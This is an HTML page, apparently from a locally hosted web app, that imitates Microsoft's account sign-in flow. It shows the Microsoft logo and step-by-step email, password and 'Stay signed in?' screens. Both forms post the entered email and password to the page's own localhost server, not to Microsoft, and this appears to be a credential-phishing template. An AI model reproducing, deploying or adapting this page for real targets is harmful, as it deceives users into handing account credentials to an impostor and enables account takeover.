<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <link rel="icon" href="http://localhost:8000/assets/favicon.ico" />
    <title>Sign in to your Microsoft account</title>
    <link rel="stylesheet" href="http://localhost:8000/assets/app.css" />
</head>
<body class="auth-page">
    <section id="section_uname">
        <div class="auth-wrapper">
            <img src="http://localhost:8000/assets/logo.png" alt="Microsoft" />
            <h2 class="mt-16 mb-16 title">Sign in</h2>

            <form method="POST" action="http://localhost:8000/login">
                <input type="hidden" name="_token" value="CwtDBuczgLRqm9ieXiZnHsaWKzTWKWN9a45hpLqt" autocomplete="off">                <div class="mb-16">
                                        <input id="inp_uname" type="text" name="email" class="input" placeholder="Email, phone, or Skype" value="" required autofocus />
                </div>
                <div>
                    <button class="btn" id="btn_next" type="submit">Next</button>
                </div>
            </form>

            <div>
                <p class="mb-16 fs-13">No account? <a href="#" class="link">Create one!</a></p>
                <p class="mb-16 fs-13">
                    <a href="#" class="link">Sign in with a security key
                        <img src="http://localhost:8000/assets/question.png" alt="Question img">
                    </a>
                </p>
            </div>
        </div>
        <div class="opts">
            <p class="mb-0 has-icon" style="font-size:15px;"><span class="icon"><img src="http://localhost:8000/assets/key.png" width="30px" /></span> Sign-in options</p>
        </div>
    </section>

    <section id="section_pwd" class="d-none">
        <div class="auth-wrapper">
            <img src="http://localhost:8000/assets/logo.png" alt="Microsoft" class="d-block" />
            <div class="mt-16 mb-16 identity w-100">
                <button class="back">
                    <img src="http://localhost:8000/assets/back.png" />
                </button>
                <span id="user_identity">user@example.com</span>
            </div>
            <h2 class="mb-16 title">Enter password</h2>
            <form method="POST" action="http://localhost:8000/login">
                <input type="hidden" name="_token" value="CwtDBuczgLRqm9ieXiZnHsaWKzTWKWN9a45hpLqt" autocomplete="off">                <div class="mb-16">
                                        <input id="inp_pwd" type="password" name="password" class="input" placeholder="Password" />
                </div>
                <div>
                    <button class="btn" id="btn_sig" type="submit">Sign in</button>
                </div>
            </form>
        </div>
    </section>

    <section id="section_final" class="d-none">
        <div class="auth-wrapper">
            <img src="http://localhost:8000/assets/logo.png" alt="Microsoft" class="d-block" />
            <div class="mt-16 mb-16 identity w-100">
                <span id="user_identity">user@example.com</span>
            </div>
            <h2 class="mb-16 title">Stay signed in?</h2>
            <p class="p">Stay signed in so you don't have to sign in again next time.</p>
            <label class="has-checkbox">
                <input type="checkbox" class="checkbox" />
                <span>Don't show this again</span>
            </label>
            <div class="btn-group">
                <button class="btn btn-sec" id="btn_final">No</button>
                <button class="btn" id="btn_final_yes">Yes</button>
            </div>
        </div>
    </section>
    <footer class="footer">
        <a href="#">Terms of use</a>
        <a href="#">Privacy & cookies</a>
        <span>.&nbsp;.&nbsp;.</span>
    </footer>
    <script src="http://localhost:8000/assets/app.js"></script>
</body>
</html>
